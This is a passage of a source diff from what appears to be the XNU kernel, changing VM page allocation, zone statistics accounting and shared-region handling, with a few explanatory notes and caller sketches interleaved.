-               mem->vmp_snext = lo_page_list;
-               lo_page_list = mem;
+
+               page_grab_count++;
+               mem->vmp_snext = page_list;
+               page_list = mem;
        }
-       *list = lo_page_list;
 
-       return KERN_SUCCESS;
+       if (KMA_ZERO & flags) {
+               for (mem = page_list; mem; mem = mem->vmp_snext) {
+                       vm_page_zero_fill(mem);
+               }
+       }
+
+out:
+#if DEBUG || DEVELOPMENT
+       if (task != NULL) {
+               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
+       }
+#endif
+
+       if (kr == KERN_SUCCESS) {
+               *list = page_list;
+       } else {
+               vm_page_free_list(page_list, FALSE);
+       }
+
+       return kr;
 }
 
 void
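
A minimal caller sketch for the generalized vm_page_alloc_list() above; the flag combination is illustrative, and the loop simply walks the returned singly linked list:

    vm_page_t list, m;
    kern_return_t kr;

    kr = vm_page_alloc_list(8, KMA_ZERO | KMA_NOPAGEWAIT, &list);
    if (kr == KERN_SUCCESS) {
        for (m = list; m != VM_PAGE_NULL; m = m->vmp_snext) {
            /* pages arrive zero-filled; wire or insert them as needed */
        }
        vm_page_free_list(list, FALSE);    /* release when done */
    }
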
@@ -7200,7 +7198,7 @@ hibernate_flush_memory()
                        orig_wire_count = vm_page_wire_count;
 
                        (void)(*consider_buffer_cache_collect)(1);
-                       consider_zone_gc(FALSE);
+                       zone_gc(ZONE_GC_DRAIN);
 
                        HIBLOG("hibernate_flush_memory: buffer_cache_gc freed up %d wired pages\n", orig_wire_count - vm_page_wire_count);
 
@@ -9150,36 +9148,45 @@ vm_allocation_zones_init(void)
        vm_allocation_zone_totals[VM_KERN_MEMORY_KALLOC] = (vm_allocation_zone_total_t *) addr;
 }
 
-void
-vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx)
+__attribute__((noinline))
+static vm_tag_t
+vm_tag_zone_stats_alloc(vm_tag_t tag, zalloc_flags_t flags)
 {
-       vm_allocation_zone_total_t * zone;
+       vm_allocation_zone_total_t *stats;
+       vm_size_t size = sizeof(*stats) * VM_MAX_TAG_ZONES;
 
+       stats = kheap_alloc(KHEAP_DATA_BUFFERS, size,
+           Z_VM_TAG(VM_KERN_MEMORY_DIAG) | Z_ZERO | flags);
+       if (!stats) {
+               return VM_KERN_MEMORY_NONE;
+       }
+       if (!os_atomic_cmpxchg(&vm_allocation_zone_totals[tag], NULL, stats, release)) {
+               kheap_free(KHEAP_DATA_BUFFERS, stats, size);
+       }
+       return tag;
+}
+
+vm_tag_t
+vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags)
+{
        assert(VM_KERN_MEMORY_NONE != tag);
        assert(tag < VM_MAX_TAG_VALUE);
 
        if (zidx >= VM_MAX_TAG_ZONES) {
-               return;
+               return VM_KERN_MEMORY_NONE;
        }
 
-       zone = vm_allocation_zone_totals[tag];
-       if (!zone) {
-               zone = kalloc_tag(VM_MAX_TAG_ZONES * sizeof(*zone), VM_KERN_MEMORY_DIAG);
-               if (!zone) {
-                       return;
-               }
-               bzero(zone, VM_MAX_TAG_ZONES * sizeof(*zone));
-               if (!OSCompareAndSwapPtr(NULL, zone, &vm_allocation_zone_totals[tag])) {
-                       kfree(zone, VM_MAX_TAG_ZONES * sizeof(*zone));
-               }
+       if (__probable(vm_allocation_zone_totals[tag])) {
+               return tag;
        }
+       return vm_tag_zone_stats_alloc(tag, zflags);
 }
 
 void
-vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste)
+vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta)
 {
-       vm_allocation_zone_total_t * zone;
-       uint32_t new;
+       vm_allocation_zone_total_t *stats;
+       vm_size_t value;
 
        assert(VM_KERN_MEMORY_NONE != tag);
        assert(tag < VM_MAX_TAG_VALUE);
@@ -9188,30 +9195,16 @@ vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwas
                return;
        }
 
-       zone = vm_allocation_zone_totals[tag];
-       assert(zone);
-       zone += zidx;
+       stats = vm_allocation_zone_totals[tag];
+       assert(stats);
+       stats += zidx;
 
-       /* the zone is locked */
+       value = os_atomic_add(&stats->vazt_total, delta, relaxed);
        if (delta < 0) {
-               assertf(zone->total >= ((uint64_t)-delta), "zidx %d, tag %d, %p", zidx, tag, zone);
-               zone->total += delta;
-       } else {
-               zone->total += delta;
-               if (zone->total > zone->peak) {
-                       zone->peak = zone->total;
-               }
-               if (dwaste) {
-                       new = zone->waste;
-                       if (zone->wastediv < 65536) {
-                               zone->wastediv++;
-                       } else {
-                               new -= (new >> 16);
-                       }
-                       __assert_only bool ov = os_add_overflow(new, dwaste, &new);
-                       assert(!ov);
-                       zone->waste = new;
-               }
+               assertf((long)value >= 0, "zidx %d, tag %d, %p", zidx, tag, stats);
+               return;
+       } else if (os_atomic_load(&stats->vazt_peak, relaxed) < value) {
+               os_atomic_max(&stats->vazt_peak, value, relaxed);
        }
 }
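
A minimal sketch of how an allocation path might drive this pair under the new lock-free accounting; the call sequence is an assumption based on the signatures above, not code from this commit:

    vm_tag_t t = vm_tag_will_update_zone(tag, zidx, Z_WAITOK);
    if (t != VM_KERN_MEMORY_NONE) {
        vm_tag_update_zone_size(t, zidx, (long)elem_size);     /* on allocation */
        /* ... */
        vm_tag_update_zone_size(t, zidx, -(long)elem_size);    /* on free */
    }
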
 
@@ -9416,19 +9409,16 @@ process_account(mach_memory_info_t * info, unsigned int num_info,
                    && (zone = vm_allocation_zone_totals[idx])
                    && (nextinfo < num_info)) {
                        for (zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) {
-                               if (!zone[zidx].peak) {
+                               if (!zone[zidx].vazt_peak) {
                                        continue;
                                }
                                info[nextinfo]        = info[idx];
                                info[nextinfo].zone   = (uint16_t)zone_index_from_tag_index(zidx, &elem_size);
                                info[nextinfo].flags  &= ~VM_KERN_SITE_WIRED;
                                info[nextinfo].flags  |= VM_KERN_SITE_ZONE;
-                               info[nextinfo].size   = zone[zidx].total;
-                               info[nextinfo].peak   = zone[zidx].peak;
+                               info[nextinfo].size   = zone[zidx].vazt_total;
+                               info[nextinfo].peak   = zone[zidx].vazt_peak;
                                info[nextinfo].mapped = 0;
-                               if (zone[zidx].wastediv) {
-                                       info[nextinfo].collectable_bytes = ((zone[zidx].waste * zone[zidx].total / elem_size) / zone[zidx].wastediv);
-                               }
                                nextinfo++;
                        }
                }
@@ -9490,9 +9480,7 @@ vm_page_diagnose_estimate(void)
                                continue;
                        }
                        for (uint32_t zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) {
-                               if (zone[zidx].peak) {
-                                       count++;
-                               }
+                               count += (zone[zidx].vazt_peak != 0);
                        }
                }
 #endif
@@ -9522,7 +9510,7 @@ vm_page_diagnose_zone_stats(mach_memory_info_t *info, zone_stats_t zstats,
 static void
 vm_page_diagnose_zone(mach_memory_info_t *info, zone_t z)
 {
-       vm_page_diagnose_zone_stats(info, z->z_stats, z->percpu);
+       vm_page_diagnose_zone_stats(info, z->z_stats, z->z_percpu);
        snprintf(info->name, sizeof(info->name),
            "%s%s[raw]", zone_heap_name(z), z->z_name);
 }
@@ -9562,13 +9550,13 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone
                return KERN_ABORTED;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        wired_size          = ptoa_64(vm_page_wire_count);
        wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count);
-#else
+#else /* !XNU_TARGET_OS_OSX */
        wired_size          = ptoa_64(vm_page_wire_count + vm_lopage_free_count + vm_page_throttled_count);
        wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count + vm_page_throttled_count);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        wired_managed_size  = ptoa_64(vm_page_wire_count - vm_page_wire_count_initial);
 
        wired_size += booter_size;
@@ -9643,7 +9631,7 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone
 
                for (; zv; zv = zv->zv_next) {
                        vm_page_diagnose_zone_stats(counts + i, zv->zv_stats,
-                           z->percpu);
+                           z->z_percpu);
                        snprintf(counts[i].name, sizeof(counts[i].name), "%s%s[%s]",
                            zone_heap_name(z), z->z_name, zv->zv_name);
                        i++;
@@ -9827,3 +9815,39 @@ stop_secluded_suppression(task_t task)
 }
 
 #endif /* CONFIG_SECLUDED_MEMORY */
+
+/*
+ * Move the list of retired pages on the vm_page_queue_retired to
+ * their final resting place on retired_pages_object.
+ */
+void
+vm_retire_boot_pages(void)
+{
+#if defined(__arm64__)
+       vm_page_t p;
+
+       vm_object_lock(retired_pages_object);
+       while (!vm_page_queue_empty(&vm_page_queue_retired)) {
+               vm_page_queue_remove_first(&vm_page_queue_retired, p, vmp_pageq);
+               assert(p != NULL);
+               vm_page_lock_queues();
+               p->vmp_q_state = VM_PAGE_IS_WIRED;
+               p->vmp_wire_count++;
+               vm_page_unlock_queues();
+               vm_page_insert_wired(p, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(p)), VM_KERN_MEMORY_RETIRED);
+               vm_object_unlock(retired_pages_object);
+               pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(p));
+               vm_object_lock(retired_pages_object);
+       }
+       vm_object_unlock(retired_pages_object);
+#endif /* defined(__arm64__) */
+}
+
+/*
+ * Returns the current number of retired pages, used for sysctl.
+ */
+uint32_t
+vm_retired_pages_count(void)
+{
+       return retired_pages_object->resident_page_count;
+}
index 115b247130e6ac0e9d2db7ac75764585068d60f8..fb594cd869121b19f3cda9d3e6b358ed040182c7 100644 (file)
@@ -143,16 +143,23 @@ int shared_region_persistence = 0;      /* no by default */
 /* delay in seconds before reclaiming an unused shared region */
 TUNABLE_WRITEABLE(int, shared_region_destroy_delay, "vm_shared_region_destroy_delay", 120);
 
-struct vm_shared_region *init_task_shared_region = NULL;
+/*
+ * Cached pointer to the most recently mapped shared region from PID 1, which should
+ * be the most commonly mapped shared region in the system.  There are many processes
+ * which do not use this, for a variety of reasons.
+ *
+ * The main consumer of this is stackshot.
+ */
+struct vm_shared_region *primary_system_shared_region = NULL;
 
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 /*
  * Only one cache gets to slide on Desktop, since we can't
  * tear down slide info properly today and the desktop actually
  * produces lots of shared caches.
  */
 boolean_t shared_region_completed_slide = FALSE;
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 /* this lock protects all the shared region data structures */
 static LCK_GRP_DECLARE(vm_shared_region_lck_grp, "vm shared region");
@@ -203,10 +210,10 @@ static kern_return_t vm_shared_region_slide_mapping(
        vm_prot_t          prot); /* forward */
 
 static int __commpage_setup = 0;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static int __system_power_source = 1;   /* init to external power source */
 static void post_sys_powersource_internal(int i, int internal);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 extern u_int32_t random(void);
 
@@ -244,75 +251,6 @@ vm_shared_region_get(
        return shared_region;
 }
 
-/*
- * Get the base address of the shared region.
- * That's the address at which it needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-mach_vm_offset_t
-vm_shared_region_base_address(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> base_address(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: base_address(%p) <- 0x%llx\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (long long)shared_region->sr_base_address));
-       return shared_region->sr_base_address;
-}
-
-/*
- * Get the size of the shared region.
- * That's the size that needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-mach_vm_size_t
-vm_shared_region_size(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> size(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: size(%p) <- 0x%llx\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (long long)shared_region->sr_size));
-       return shared_region->sr_size;
-}
-
-/*
- * Get the memory entry of the shared region.
- * That's the "memory object" that needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-ipc_port_t
-vm_shared_region_mem_entry(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> mem_entry(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: mem_entry(%p) <- %p\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (void *)VM_KERNEL_ADDRPERM(shared_region->sr_mem_entry)));
-       return shared_region->sr_mem_entry;
-}
-
 vm_map_t
 vm_shared_region_vm_map(
        vm_shared_region_t      shared_region)
@@ -324,7 +262,7 @@ vm_shared_region_vm_map(
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: -> vm_map(%p)\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        sr_handle = shared_region->sr_mem_entry;
        sr_mem_entry = (vm_named_entry_t) ip_get_kobject(sr_handle);
@@ -619,6 +557,11 @@ vm_shared_region_deallocate(
                } else {
                        /* timer expired: let go of this shared region */
 
+                       /* Make sure there's no cached pointer to the region. */
+                       if (primary_system_shared_region == shared_region) {
+                               primary_system_shared_region = NULL;
+                       }
+
                        /*
                         * Remove it from the queue first, so no one can find
                         * it...
@@ -977,11 +920,13 @@ vm_shared_region_destroy(
 
 /*
  * Gets the address of the first (in time) mapping in the shared region.
+ * If used during initial task setup by dyld, task should be non-NULL.
  */
 kern_return_t
 vm_shared_region_start_address(
        vm_shared_region_t      shared_region,
-       mach_vm_offset_t        *start_address)
+       mach_vm_offset_t        *start_address,
+       task_t                  task)
 {
        kern_return_t           kr;
        mach_vm_offset_t        sr_base_address;
@@ -990,7 +935,6 @@ vm_shared_region_start_address(
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: -> start_address(%p)\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
 
        vm_shared_region_lock();
 
@@ -1001,12 +945,11 @@ vm_shared_region_start_address(
         */
        while (shared_region->sr_mapping_in_progress) {
                /* wait for our turn... */
-               assert(shared_region->sr_ref_count > 1);
                vm_shared_region_sleep(&shared_region->sr_mapping_in_progress,
                    THREAD_UNINT);
        }
        assert(!shared_region->sr_mapping_in_progress);
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        sr_base_address = shared_region->sr_base_address;
        sr_first_mapping = shared_region->sr_first_mapping;
@@ -1020,8 +963,23 @@ vm_shared_region_start_address(
        }
 
 
+       uint32_t slide = shared_region->sr_slide;
+
        vm_shared_region_unlock();
 
+       /*
+        * Cache shared region info in the task for telemetry gathering, if we're
+        * passed in the task. No task lock here as we're still in initial task setup.
+        */
+       if (kr == KERN_SUCCESS && task != NULL && task->task_shared_region_slide == -1) {
+               uint_t sc_header_uuid_offset = offsetof(struct _dyld_cache_header, uuid);
+               if (copyin((user_addr_t)(*start_address + sc_header_uuid_offset),
+                   (char *)&task->task_shared_region_uuid,
+                   sizeof(task->task_shared_region_uuid)) == 0) {
+                       task->task_shared_region_slide = slide;
+               }
+       }
+
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: start_address(%p) <- 0x%llx\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region),
@@ -1105,7 +1063,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr)
                vm_shared_region_sleep(&sr->sr_mapping_in_progress, THREAD_UNINT);
        }
        assert(!sr->sr_mapping_in_progress);
-       assert(sr->sr_ref_count > 1);
+       assert(sr->sr_ref_count > 0);
 
        /* Just return if already done. */
        if (task->shared_region_auth_remapped) {
@@ -1157,8 +1115,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr)
                /*
                 * Check that the object exactly covers the region to slide.
                 */
-               if (VME_OFFSET(tmp_entry) != si->si_start ||
-                   tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) {
+               if (tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) {
                        kr = KERN_FAILURE;
                        goto done;
                }
@@ -1251,7 +1208,7 @@ vm_shared_region_undo_mappings(
                vm_named_entry_t        sr_mem_entry;
 
                vm_shared_region_lock();
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
 
                while (shared_region->sr_mapping_in_progress) {
                        /* wait for our turn... */
@@ -1259,7 +1216,7 @@ vm_shared_region_undo_mappings(
                            THREAD_UNINT);
                }
                assert(!shared_region->sr_mapping_in_progress);
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
                /* let others know we're working in this shared region */
                shared_region->sr_mapping_in_progress = TRUE;
 
@@ -1319,7 +1276,7 @@ vm_shared_region_undo_mappings(
 
        if (reset_shared_region_state) {
                vm_shared_region_lock();
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
                assert(shared_region->sr_mapping_in_progress);
                /* we're done working on that shared region */
                shared_region->sr_mapping_in_progress = FALSE;
@@ -1332,10 +1289,11 @@ vm_shared_region_undo_mappings(
 }
 
 /*
- * For now we only expect to see at most 2 regions to relocate/authenticate
- * per file. One that's VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
+ * For now we only expect to see at most 4 regions to relocate/authenticate
+ * per file. One that's RW VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
+ * And then RO VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
  */
-#define VMSR_NUM_SLIDES 2
+#define VMSR_NUM_SLIDES 4
 
 /*
  * First part of vm_shared_region_map_file(). Split out to
@@ -1379,7 +1337,7 @@ vm_shared_region_map_file_setup(
        unsigned int            current_file_index = 0;
 
        vm_shared_region_lock();
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        /*
         * Make sure we handle only one mapping at a time in a given
@@ -1392,7 +1350,7 @@ vm_shared_region_map_file_setup(
                    THREAD_UNINT);
        }
        assert(!shared_region->sr_mapping_in_progress);
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
        /* let others know we're working in this shared region */
        shared_region->sr_mapping_in_progress = TRUE;
 
@@ -1726,7 +1684,10 @@ vm_shared_region_map_file(
        mach_vm_offset_t        sfm_max_address = 0;
        vm_map_t                sr_map = NULL;
        vm_map_offset_t         lowest_unnestable_addr = 0;
-       mach_vm_offset_t        file_first_mappings[VMSR_NUM_SLIDES] = {(mach_vm_offset_t) -1, (mach_vm_offset_t) -1};
+       mach_vm_offset_t        file_first_mappings[VMSR_NUM_SLIDES];
+       for (i = 0; i < VMSR_NUM_SLIDES; ++i) {
+               file_first_mappings[i] = (mach_vm_offset_t) -1;
+       }
 
        kr = vm_shared_region_map_file_setup(shared_region, sr_file_mappings_count, sr_file_mappings,
            &mappings_to_slide_cnt, &mappings_to_slide[0], slid_mappings, slid_file_controls,
@@ -1776,7 +1737,7 @@ vm_shared_region_map_file(
        }
 
        vm_shared_region_lock();
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
        assert(shared_region->sr_mapping_in_progress);
 
        /* set "sr_first_mapping"; dyld uses it to validate the shared cache */
@@ -1806,6 +1767,13 @@ done:
        }
 #endif /* __has_feature(ptrauth_calls) */
 
+       /* Cache shared region info needed for telemetry in the task */
+       task_t task;
+       if (kr == KERN_SUCCESS && (task = current_task())->task_shared_region_slide == -1) {
+               mach_vm_offset_t start_address;
+               (void)vm_shared_region_start_address(shared_region, &start_address, task);
+       }
+
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: map(%p) <- 0x%x \n",
                (void *)VM_KERNEL_ADDRPERM(shared_region), kr));
@@ -1829,6 +1797,7 @@ vm_shared_region_map_file_final(
        int                       error;
        size_t                    image_array_length;
        struct _dyld_cache_image_text_info *sr_image_layout;
+       boolean_t                 locally_built = FALSE;
 
 
        /*
@@ -1844,6 +1813,7 @@ vm_shared_region_map_file_final(
                if (error == 0) {
                        memcpy(&shared_region->sr_uuid, &sr_cache_header.uuid, sizeof(shared_region->sr_uuid));
                        shared_region->sr_uuid_copied = TRUE;
+                       locally_built = sr_cache_header.locallyBuiltCache;
                } else {
 #if DEVELOPMENT || DEBUG
                        panic("shared_region: copyin shared_cache_header(sr_base_addr:0x%016llx sr_first_mapping:0x%016llx "
@@ -1858,19 +1828,27 @@ vm_shared_region_map_file_final(
        }
 
        /*
-        * If the shared cache is associated with the init task (and is therefore the system shared cache),
-        * check whether it is a custom built shared cache and copy in the shared cache layout accordingly.
+        * We save a pointer to the shared cache mapped by the "init task", i.e. launchd.  This is used by
+        * the stackshot code to reduce output size in the common case that everything maps the same shared cache.
+        * One gotcha is that a "userspace reboot" can cause a new shared region to become the primary
+        * region.  In that case, launchd re-execs itself, so we may go through this path multiple times.  We
+        * let the most recent one win.
+        *
+        * Check whether the shared cache is a custom built one and copy in the shared cache layout accordingly.
         */
-       boolean_t is_init_task = (task_pid(current_task()) == 1);
+       bool is_init_task = (task_pid(current_task()) == 1);
        if (shared_region->sr_uuid_copied && is_init_task) {
                /* Copy in the shared cache layout if we're running with a locally built shared cache */
-               if (sr_cache_header.locallyBuiltCache) {
+               if (locally_built) {
                        KDBG((MACHDBG_CODE(DBG_MACH_SHAREDREGION, PROCESS_SHARED_CACHE_LAYOUT)) | DBG_FUNC_START);
                        image_array_length = (size_t)(sr_cache_header.imagesTextCount * sizeof(struct _dyld_cache_image_text_info));
                        sr_image_layout = kheap_alloc(KHEAP_DATA_BUFFERS, image_array_length, Z_WAITOK);
                        error = copyin((user_addr_t)(shared_region->sr_base_address + shared_region->sr_first_mapping +
                            sr_cache_header.imagesTextOffset), (char *)sr_image_layout, image_array_length);
                        if (error == 0) {
+                               if (sr_cache_header.imagesTextCount >= UINT32_MAX) {
+                                       panic("shared_region: sr_cache_header.imagesTextCount >= UINT32_MAX");
+                               }
                                shared_region->sr_images = kalloc((vm_size_t)(sr_cache_header.imagesTextCount * sizeof(struct dyld_uuid_info_64)));
                                for (size_t index = 0; index < sr_cache_header.imagesTextCount; index++) {
                                        memcpy((char *)&shared_region->sr_images[index].imageUUID, (char *)&sr_image_layout[index].uuid,
@@ -1878,7 +1856,6 @@ vm_shared_region_map_file_final(
                                        shared_region->sr_images[index].imageLoadAddress = sr_image_layout[index].loadAddress;
                                }
 
-                               assert(sr_cache_header.imagesTextCount < UINT32_MAX);
                                shared_region->sr_images_count = (uint32_t) sr_cache_header.imagesTextCount;
                        } else {
 #if DEVELOPMENT || DEBUG
@@ -1895,7 +1872,7 @@ vm_shared_region_map_file_final(
                        kheap_free(KHEAP_DATA_BUFFERS, sr_image_layout, image_array_length);
                        sr_image_layout = NULL;
                }
-               init_task_shared_region = shared_region;
+               primary_system_shared_region = shared_region;
        }
 
        /*
@@ -2984,22 +2961,22 @@ vm_shared_region_slide_page(
 /* Comm page support                                                          */
 /******************************************************************************/
 
-ipc_port_t commpage32_handle = IPC_PORT_NULL;
-ipc_port_t commpage64_handle = IPC_PORT_NULL;
-vm_named_entry_t commpage32_entry = NULL;
-vm_named_entry_t commpage64_entry = NULL;
-vm_map_t commpage32_map = VM_MAP_NULL;
-vm_map_t commpage64_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage32_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage64_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage32_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage64_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage32_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage64_map = VM_MAP_NULL;
 
-ipc_port_t commpage_text32_handle = IPC_PORT_NULL;
-ipc_port_t commpage_text64_handle = IPC_PORT_NULL;
-vm_named_entry_t commpage_text32_entry = NULL;
-vm_named_entry_t commpage_text64_entry = NULL;
-vm_map_t commpage_text32_map = VM_MAP_NULL;
-vm_map_t commpage_text64_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text32_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text64_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text32_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text64_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text32_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text64_map = VM_MAP_NULL;
 
-user32_addr_t commpage_text32_location = 0;
-user64_addr_t commpage_text64_location = 0;
+SECURITY_READ_ONLY_LATE(user32_addr_t) commpage_text32_location = 0;
+SECURITY_READ_ONLY_LATE(user64_addr_t) commpage_text64_location = 0;
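The commpage globals above gain SECURITY_READ_ONLY_LATE, which places a variable in memory that is writable during early boot and then sealed read-only. A minimal sketch of the idiom, assuming only the annotation itself; the global and setup routine below are hypothetical.

/* Hypothetical once-written global: set during early boot, then immutable
 * (and tamper-resistant) for the rest of the system's lifetime. */
SECURITY_READ_ONLY_LATE(ipc_port_t) example_handle = IPC_PORT_NULL;

static void
example_early_init(ipc_port_t port)
{
        /* Must run before the late-const region is locked down; a store to
         * example_handle after lockdown would fault. */
        example_handle = port;
}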
 
 #if defined(__i386__) || defined(__x86_64__)
 /*
@@ -3098,11 +3075,11 @@ vm_commpage_init(void)
        /* populate them according to this specific platform */
        commpage_populate();
        __commpage_setup = 1;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (__system_power_source == 0) {
                post_sys_powersource_internal(0, 1);
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        SHARED_REGION_TRACE_DEBUG(
                ("commpage: init() <-\n"));
@@ -3322,11 +3299,11 @@ vm_shared_region_slide(
        sr->sr_slide_in_progress = FALSE;
        thread_wakeup(&sr->sr_slide_in_progress);
 
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (error == KERN_SUCCESS) {
                shared_region_completed_slide = TRUE;
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        vm_shared_region_unlock();
 
        vm_shared_region_deallocate(sr);
@@ -3449,19 +3426,19 @@ vm_shared_region_is_reslide(__unused struct task *task)
  * 1 if it is internal power source ie battery
  */
 void
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 post_sys_powersource(int i)
-#else
+#else /* XNU_TARGET_OS_OSX */
 post_sys_powersource(__unused int i)
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 {
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        post_sys_powersource_internal(i, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 }
 
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static void
 post_sys_powersource_internal(int i, int internal)
 {
@@ -3469,7 +3446,7 @@ post_sys_powersource_internal(int i, int internal)
                __system_power_source = i;
        }
 }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 void *
 vm_shared_region_root_dir(
index cc76069a0543b4d0dfbf1f6ddfc6afa5767f743d..bfe8682416babc0b452fbe08061125b1360cbb14 100644 (file)
@@ -58,7 +58,7 @@ extern int shared_region_debug;
 
 extern int shared_region_trace_level;
 
-extern struct vm_shared_region *init_task_shared_region;
+extern struct vm_shared_region *primary_system_shared_region;
 
 #define SHARED_REGION_TRACE_NONE_LVL            0 /* no trace */
 #define SHARED_REGION_TRACE_ERROR_LVL           1 /* trace abnormal events */
@@ -276,12 +276,6 @@ extern vm_shared_region_t vm_shared_region_trim_and_get(
        struct task             *task);
 extern void vm_shared_region_deallocate(
        struct vm_shared_region *shared_region);
-extern mach_vm_offset_t vm_shared_region_base_address(
-       struct vm_shared_region *shared_region);
-extern mach_vm_size_t vm_shared_region_size(
-       struct vm_shared_region *shared_region);
-extern ipc_port_t vm_shared_region_mem_entry(
-       struct vm_shared_region *shared_region);
 extern vm_map_t vm_shared_region_vm_map(
        struct vm_shared_region *shared_region);
 extern void vm_shared_region_set(
@@ -295,7 +289,8 @@ extern vm_shared_region_t vm_shared_region_lookup(
        boolean_t               reslide);
 extern kern_return_t vm_shared_region_start_address(
        struct vm_shared_region *shared_region,
-       mach_vm_offset_t        *start_address);
+       mach_vm_offset_t        *start_address,
+       task_t                  task);
 extern void vm_shared_region_undo_mappings(
        vm_map_t sr_map,
        mach_vm_offset_t sr_base_address,
index 3a1bb8fc94ae342412e4197d5e9f98806f02f246..3af00d6026a28f92c7119889998c92d623c7890d 100644 (file)
@@ -291,11 +291,15 @@ done:
  * the "shared_region" EMM.
  */
 typedef struct shared_region_pager {
